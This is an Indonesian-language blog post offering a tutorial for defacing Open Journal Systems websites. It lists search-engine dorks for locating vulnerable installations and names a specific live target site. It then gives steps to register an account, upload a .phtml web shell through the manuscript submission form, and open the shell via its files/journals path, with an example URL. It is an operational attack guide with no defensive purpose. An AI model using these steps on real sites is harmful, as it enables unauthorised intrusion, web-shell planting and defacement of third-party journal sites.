
sekarang saya akan mengeshare toturial deface open journals system :)
meskipun sudah banyak yang tau toturial kali ini :) tapi saya akan mengeshare versi saya :)
dork :inurl:index.php/index/user/regster site:
:inurl:/files/journals/1/
:"kntl"+intitle:"open journals system"
exploit :/files/journals/
vuln :403 forhidden or index of /files
live taget: http://www.jghcs.info
1.pertama anda dorking terlebih dahulu di google atau pun di bing
2.cari target anda lalu masukan exploit:/files/journals jika ada bacaan forhidden atau index of /files berarti vuln
3.lalu anda register ke site tersebut cek gambar
4.kemudian klik new submission dan ikuti langakah" pada gambar berikut :D
akses shell www.site.co.li/files/journals/1/articles/nopertama/submission/original/nomernya.phtml
contoh:
http://www.jghcs.info/files/journals/58/articles/526/submission/original/526-2010-1-SM.txt
terima kasih banyak telah mampir di blog saya jika ada kesalahan mohon maaf dan bila ada kritik atau saran tinggal komentar di bawah ini :D